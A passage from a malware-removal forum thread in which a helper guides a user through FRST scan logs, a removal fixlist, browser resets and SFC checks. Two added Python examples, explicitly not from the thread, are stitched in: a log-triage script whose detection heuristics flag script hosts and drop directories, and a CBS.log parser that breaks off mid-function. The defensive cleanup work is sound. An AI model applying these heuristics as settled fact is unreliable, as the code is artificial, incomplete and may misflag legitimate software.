2014-09-03 12:25 - 2014-09-03 12:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-03 12:25 - 2014-09-03 12:25 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-03 12:25 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-02 17:32 - 2014-09-30 15:25 - 00001732 _____ () C:\Windows\setupact.log
2014-09-02 17:32 - 2014-09-21 21:29 - 00458432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-02 17:32 - 2014-09-02 17:32 - 00000000 _____ () C:\Windows\setuperr.log
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-30 15:29 - 2009-10-27 14:56 - 01353069 _____ () C:\Windows\WindowsUpdate.log
2014-09-30 15:25 - 2012-09-16 19:12 - 00000368 ____H () C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job
2014-09-30 15:25 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-30 14:40 - 2014-02-20 18:50 - 00000542 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3148415299-674671827-1884196446-1000.job
2014-09-30 14:36 - 2012-06-07 17:14 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-30 06:52 - 2014-02-20 18:50 - 00003572 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3148415299-674671827-1884196446-1000
2014-09-29 05:04 - 2009-07-13 23:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-29 05:04 - 2009-07-13 23:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-28 14:50 - 2013-11-14 01:38 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-09-28 03:00 - 2014-04-17 21:23 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-09-27 10:45 - 2014-03-30 11:35 - 00348672 ___SH () C:\Users\Camille\Documents\Thumbs.db
2014-09-23 10:03 - 2014-08-28 16:31 - 00130480 _____ () C:\Users\Camille\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-21 21:27 - 2012-09-16 19:11 - 00000000 ____D () C:\ProgramData\InstallMate
2014-09-21 21:26 - 2010-12-06 21:01 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\DVDVideoSoft
2014-09-21 03:01 - 2013-12-07 10:27 - 00000000 ____D () C:\Users\Camille\AppData\Local\Htc
2014-09-16 18:19 - 2009-07-14 00:13 - 00785946 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-10 17:22 - 2009-12-30 18:22 - 00003200 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForCamille
2014-09-10 17:22 - 2009-12-30 18:22 - 00000342 _____ () C:\Windows\Tasks\HPCeeScheduleForCamille.job
2014-09-03 13:03 - 2009-10-08 02:31 - 00000000 ____D () C:\ProgramData\Symantec
2014-09-03 13:02 - 2010-12-30 18:30 - 00003360 _____ () C:\Windows\System32\Tasks\RunAsStdUser Task
2014-09-03 13:02 - 2010-12-30 18:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iWin Games
2014-09-03 12:25 - 2013-10-12 10:47 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\Malwarebytes
2014-09-03 12:25 - 2013-10-12 10:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-03 12:25 - 2013-10-12 10:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-02 20:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Msdtc
2014-09-02 17:36 - 2009-10-27 14:56 - 00000000 ____D () C:\Windows\sold.old
2014-09-02 17:33 - 2009-12-29 17:55 - 00000000 ____D () C:\Users\Camille
2014-09-02 17:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\catroot2.old
 
Files to move or delete:
====================
C:\Users\Camille\jagex_runescape_preferences.dat
C:\Users\Camille\jagex_runescape_preferences2.dat
 
 
Some content of TEMP:
====================
C:\Users\Camille\AppData\Local\Temp\Quarantine.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-26 00:19
 
==================== End Of Log ============================




#6 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 01 October 2014 - 06:55 AM

Open Notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
start

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
SearchScopes: HKLM - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {5BED3930-2E9E-76D8-BACC-80DF2188D455} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Extension: XULRunner - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} [2011-08-14]
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S4 McciServiceHost; "C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
Task: {08248352-EAC1-4D0C-B7DE-9B65F6A632E0} - System32\Tasks\4876 => Wscript.exe C:\Users\Camille\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {B716FFA7-068B-48D8-8C17-219587B2AA26} - System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
Task: {E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:37C8DB03
AlternateDataStreams: C:\ProgramData\Temp:46545F5C
AlternateDataStreams: C:\ProgramData\Temp:53F381F1
AlternateDataStreams: C:\ProgramData\Temp:7C3E753C
AlternateDataStreams: C:\ProgramData\Temp:81B52FA6
AlternateDataStreams: C:\ProgramData\Temp:AB554F94
AlternateDataStreams: C:\ProgramData\Temp:ABE30DDB
AlternateDataStreams: C:\ProgramData\Temp:B894C266
AlternateDataStreams: C:\ProgramData\Temp:CF2C26D2
AlternateDataStreams: C:\ProgramData\Temp:D0F51BEA
AlternateDataStreams: C:\ProgramData\Temp:D82A9FCF
AlternateDataStreams: C:\ProgramData\Temp:E6427C0F
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
C:\ProgramData\Codec-V
C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}
C:\ProgramData\Premium\Codec
REBOOT:
End
Save the file as fixlist.txt in the same folder as FRST.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.
Latest version is Java JRE 7u67.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as a Java update!
Important: read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882


If present, remove the old version(s) of Java using the Add/Remove Programs applet.

Java 6 Update 26

===

Critical vulnerabilities have been identified in old versions of Adobe Flash Player; please get the latest version.

Flash test site:
http://www.adobe.com/software/flash/about/
Install the new version or, if you already have the latest, close the window.

Flash Player Help / Find version
http://helpx.adobe.com/flash-player/kb/find-version-flash-player.html#main_Find_the_Flash_Player_version_installed_on_your_machine
===

How is the computer running now?
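
As an added example (mine, not part of this thread and not FRST's own code), the script below parses the four line shapes that appear in the FRST log and fixlist above (driver/service lines, Task lines, CHR extension lines and AlternateDataStreams lines) and ranks them with defender-side heuristics: tasks that launch a script host or point into Temp/AppData/ProgramData, registry entries whose file is gone, machine-wide Chrome extension registrations, and streams attached to folders. The severity labels and heuristics are this example's own, not FRST's. The sample block it runs over is copied from this thread, except for one benign task line that is constructed as a placeholder and marked as such.

```python
"""Triage helper for lines from an FRST (Farbar Recovery Scan Tool) log.

Added example: not part of the forum thread and not FRST's own code.
The heuristics and severity labels below are this example's own.
"""
import re
from dataclasses import dataclass

# Line shapes as FRST prints them (see the log in this thread).
DRIVER_RE = re.compile(r"^(?P<start>[RSU]\d)\s+(?P<name>[^;]+);\s*(?P<rest>.*)$")
# The vendor sits in parentheses right after the "[size date]" bracket;
# anchoring on "]" avoids matching the "(x86)" in "Program Files (x86)".
VENDOR_RE = re.compile(r"\]\s*\((?P<vendor>.*)\)\s*(?:\[File not signed\])?$")
TASK_RE = re.compile(r"^Task:\s+(?P<task>.+?)\s+=>\s+(?P<action>.*?)\s*(?P<attn><==== ATTENTION)?$")
CHR_EXT_RE = re.compile(r"^CHR\s+(?P<hive>HK\S*?)\\Chrome\\Extension:\s+\[(?P<id>\w+)\]\s+-\s+(?P<path>.+?)\s*\[\]$")
ADS_RE = re.compile(r"^AlternateDataStreams:\s+(?P<path>.+?):(?P<stream>[^:\\]+)$")

# Script hosts often used to run a dropped script from a task, and
# directories that a legitimate installer rarely uses for a task target.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
DROP_DIRS = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\")


@dataclass
class Finding:
    severity: str   # "high", "medium" or "low"
    kind: str       # "task", "service", "driver", "extension" or "ads"
    item: str
    reason: str


def _task_reasons(action: str, flagged_by_frst: bool) -> list[str]:
    reasons = []
    low = action.lower()
    tokens = low.split()
    exe = tokens[0].rsplit("\\", 1)[-1] if tokens else ""
    if exe in SCRIPT_HOSTS:
        reasons.append(f"action runs a script host ({exe})")
    if any(d in low for d in DROP_DIRS):
        reasons.append("target lives under Temp/AppData/ProgramData/Public")
    if flagged_by_frst:
        reasons.append("FRST marked the entry ATTENTION")
    return reasons


def triage_line(line: str):
    """Return a Finding for one log line, or None if nothing stands out."""
    line = line.strip()
    m = TASK_RE.match(line)
    if m:
        reasons = _task_reasons(m.group("action"), bool(m.group("attn")))
        return Finding("high", "task", m.group("task"), "; ".join(reasons)) if reasons else None
    m = ADS_RE.match(line)
    if m:
        return Finding("medium", "ads", m.group("path"),
                       f"alternate data stream ':{m.group('stream')}' attached to the path")
    m = CHR_EXT_RE.match(line)
    if m and m.group("hive").upper().startswith("HKLM"):
        return Finding("medium", "extension", m.group("id"),
                       f"machine-wide Chrome extension registration pointing at {m.group('path')}")
    m = DRIVER_RE.match(line)
    if m:
        name, rest = m.group("name"), m.group("rest")
        if rest.endswith("[X]") or rest == "No ImagePath":
            return Finding("medium", "service", name, "registry entry with no file behind it (orphaned)")
        vm = VENDOR_RE.search(rest)
        vendor = vm.group("vendor").strip() if vm else ""
        if not vendor:
            return Finding("low", "driver", name, "no vendor in version info")
        # In this Windows 7 log every in-box Microsoft driver carries
        # "[File not signed]", so the tag only means something for third parties.
        if "[File not signed]" in rest and "microsoft" not in vendor.lower():
            return Finding("low", "driver", name, f"third-party driver ({vendor}) reported unsigned")
    return None


def triage(log_text: str) -> list[Finding]:
    """Triage every line and return findings ordered high -> medium -> low."""
    order = {"high": 0, "medium": 1, "low": 2}
    found = [f for f in map(triage_line, log_text.splitlines()) if f]
    return sorted(found, key=lambda f: order[f.severity])  # stable: keeps log order within a level


# Lines copied from the FRST log and fixlist in this thread; the
# "ExampleVendorUpdate" task is a constructed benign placeholder.
SAMPLE_LOG = r"""
R3 mrxsmb; C:\Windows\System32\DRIVERS\mrxsmb.sys [158208 2011-04-26] (Microsoft Corporation) [File not signed]
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 LVPr2M64; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
Task: {08248352-EAC1-4D0C-B7DE-9B65F6A632E0} - System32\Tasks\4876 => Wscript.exe C:\Users\Camille\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {B716FFA7-068B-48D8-8C17-219587B2AA26} - System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
Task: {E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\ExampleVendorUpdate => C:\Program Files\ExampleVendor\Update.exe
AlternateDataStreams: C:\ProgramData\Temp:37C8DB03
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.kind:9} {f.item}\n         {f.reason}")
```

Run against the sample it reports the three ATTENTION tasks first, then the orphaned catchme and CVPNDrv entries, the HKLM-registered Codec-V extension and the two streams, and finally the two third-party driver notes; the Microsoft mrxsmb line and the constructed benign task produce nothing. The ADS rule is deliberately blunt: a stream on a folder such as C:\ProgramData\Temp is unusual enough to list, but a stream like AFP_AfpInfo on a .DS_Store file is a Mac file-sharing artefact, so every item at "medium" still needs a human decision rather than automatic removal.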

#7 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • Local time:10:48 PM

Posted 06 October 2014 - 01:24 PM

Thank you, I updated Java and Flash. The computer seems to be redirecting less; the "not genuine Windows" message is still popping up.

 

fixlog.txt:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 29-09-2014
Ran by Camille at 2014-10-02 11:15:17 Run:1
Running from C:\Users\Camille\Desktop\Troubleshooting
Loaded Profile: Camille (Available profiles: Camille)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
 
HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
SearchScopes: HKLM - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {5BED3930-2E9E-76D8-BACC-80DF2188D455} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Extension: XULRunner - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} [2011-08-14]
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S4 McciServiceHost; "C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
Task: {08248352-EAC1-4D0C-B7DE-9B65F6A632E0} - System32\Tasks\4876 => Wscript.exe C:\Users\Camille\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {B716FFA7-068B-48D8-8C17-219587B2AA26} - System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
Task: {E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:37C8DB03
AlternateDataStreams: C:\ProgramData\Temp:46545F5C
AlternateDataStreams: C:\ProgramData\Temp:53F381F1
AlternateDataStreams: C:\ProgramData\Temp:7C3E753C
AlternateDataStreams: C:\ProgramData\Temp:81B52FA6
AlternateDataStreams: C:\ProgramData\Temp:AB554F94
AlternateDataStreams: C:\ProgramData\Temp:ABE30DDB
AlternateDataStreams: C:\ProgramData\Temp:B894C266
AlternateDataStreams: C:\ProgramData\Temp:CF2C26D2
AlternateDataStreams: C:\ProgramData\Temp:D0F51BEA
AlternateDataStreams: C:\ProgramData\Temp:D82A9FCF
AlternateDataStreams: C:\ProgramData\Temp:E6427C0F
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
C:\ProgramData\Codec-V
C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}
C:\ProgramData\Premium\Codec
REBOOT:
End
*****************
 
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key deleted successfully.
"HKCR\CLSID\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => value deleted successfully.
"HKCR\CLSID\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{5BED3930-2E9E-76D8-BACC-80DF2188D455} => value deleted successfully.
"HKCR\CLSID\{5BED3930-2E9E-76D8-BACC-80DF2188D455}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value deleted successfully.
"HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} => Moved successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\penmcajcdddmkfidjjpffbmnjfoofcda" => Key deleted successfully.
"C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx" => File/Directory not found.
ACDaemon => Service deleted successfully.
McciServiceHost => Service deleted successfully.
catchme => Service deleted successfully.
CVPNDrv => Service deleted successfully.
MREMPR5 => Service deleted successfully.
MRENDIS5 => Service deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{08248352-EAC1-4D0C-B7DE-9B65F6A632E0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08248352-EAC1-4D0C-B7DE-9B65F6A632E0}" => Key deleted successfully.
C:\Windows\System32\Tasks\4876 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4876" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B716FFA7-068B-48D8-8C17-219587B2AA26}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B716FFA7-068B-48D8-8C17-219587B2AA26}" => Key deleted successfully.
C:\Windows\System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A}" => Key deleted successfully.
C:\Windows\System32\Tasks\0 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\0" => Key deleted successfully.
C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job => Moved successfully.
C:\ProgramData\Temp => ":37C8DB03" ADS removed successfully.
C:\ProgramData\Temp => ":46545F5C" ADS removed successfully.
C:\ProgramData\Temp => ":53F381F1" ADS removed successfully.
C:\ProgramData\Temp => ":7C3E753C" ADS removed successfully.
C:\ProgramData\Temp => ":81B52FA6" ADS removed successfully.
C:\ProgramData\Temp => ":AB554F94" ADS removed successfully.
C:\ProgramData\Temp => ":ABE30DDB" ADS removed successfully.
C:\ProgramData\Temp => ":B894C266" ADS removed successfully.
C:\ProgramData\Temp => ":CF2C26D2" ADS removed successfully.
C:\ProgramData\Temp => ":D0F51BEA" ADS removed successfully.
C:\ProgramData\Temp => ":D82A9FCF" ADS removed successfully.
C:\ProgramData\Temp => ":E6427C0F" ADS removed successfully.
C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
"C:\ProgramData\Codec-V" => File/Directory not found.
"C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}" => File/Directory not found.
"C:\ProgramData\Premium\Codec" => File/Directory not found.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====


#8 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 07 October 2014 - 07:54 AM

Click the Start button. In the Search box, type Command Prompt, and then, in the list of results, double-click Command Prompt.

at the cursor type:
ipconfig /flushdns <-- (A space between g and / is needed)

ipconfig /release

repeat with
ipconfig /renew

Then hit Enter, type Exit, hit the Enter key.

You may need to run CMD - Command Prompt on Vista - Windows 7/8 with Elevated Privilege
http://www.bleepingcomputer.com/tutorials/windows-elevated-command-prompt/
<<<>>>

If that fails to remove the Redirects try this.
...

Reset all your browsers.

Reset Chrome...
Click on "Customize and control Google Chrome":
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
====

Firefox:
Reset Default Browsing settings:
https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-problems?utm_expid=65912487-41.djHNRQY0RhaLvvtvcd0BQA.2&utm_referrer=https%3A%2F%2Fwww.google.ca%2F
===

Internet Explorer:
Menu > Tools > Internet Options > General Tab.
Click the Reset button on the bottom of the pane.
Click the Apply button.
Close IE.

===
 

Regarding the "Windows is not genuine" message that pops up every day:

Run the SFC.EXE tool.

How to use the System File Checker tool to troubleshoot missing or corrupted system files on Windows Vista or on Windows 7
http://support.microsoft.com/kb/929833

Keep me posted.

#9 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 13 October 2014 - 07:49 AM

Are you still with me?

#10 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts

Posted 13 October 2014 - 09:33 AM

I am still here, thank you very much for your assistance.  I'm trying to help via TeamViewer & so when I released the ip lease I lost connection for a bit.  Running sfc right now.



#11 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts

Posted 13 October 2014 - 09:45 AM

Windows Resource Protection found corrupt files but was unable to fix some of them.  Should I post CBS.log?



#12 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 13 October 2014 - 10:48 AM

Refer to this page.
http://support.microsoft.com/kb/928228

Execute these instructions.

You can search for [SR] tags to help locate SFC.exe program entries. To perform this kind of search and to redirect the results to a text file, follow these steps:
Click the Start button, type cmd in the Start Search box, right-click cmd in the Programs list, and then click Run as administrator.

If you are prompted for an administrator password or for a confirmation, type your password, or click Continue.
Type the following command, and then press ENTER:
findstr /c:"[SR]" %windir%\logs\cbs\cbs.log >sfcdetails.txt


Post or attach the sfcdetails.txt file.
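As an added example (not from the thread, and not Microsoft's KB code), a small Python script that does what the findstr command above does and then summarizes which files SFC repaired and which it could not, which is the detail behind "unable to fix some of them". The sample log lines are constructed to follow the shape of real CBS.log [SR] entries, and the regular expressions assume that shape.

```python
import re
import sys

# Constructed sample in the shape of CBS.log "[SR]" entries (not a real log).
# The real file is %windir%\Logs\CBS\CBS.log.
SAMPLE_CBS_LOG = """\
2014-10-13 09:33:01, Info                  CSI    00000007 [SR] Verifying 100 (0x0000000000000064) components
2014-10-13 09:33:02, Info                  CSI    00000008 [SR] Beginning Verify and Repair transaction
2014-10-13 09:33:05, Info                  CSI    00000009 [SR] Cannot repair member file [l:24{12}]"wuaueng.dll" of Microsoft-Windows-WindowsUpdateClient-Core, Version = 7.6.7600.256, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral in the store, hash mismatch
2014-10-13 09:33:05, Info                  CSI    0000000a [SR] Repairing corrupted file [l:24{12}]"slc.dll" from store
2014-10-13 09:33:06, Info                  CSI    0000000b [SR] Repair complete
2014-10-13 09:33:06, Info                  CSI    0000000c [SR] Verify complete
2014-10-13 09:33:07, Info                  CBS    Exec: Processing complete.
"""

SR_TAG = "[SR]"
# File name sits in quotes after a bracketed length prefix such as [l:24{12}].
UNREPAIRED_RE = re.compile(r'\[SR\] Cannot repair member file \[[^\]]*\]"([^"]+)"')
REPAIRED_RE = re.compile(r'\[SR\] Repairing corrupted file \[[^\]]*\]"([^"]+)"')


def extract_sr_lines(log_text):
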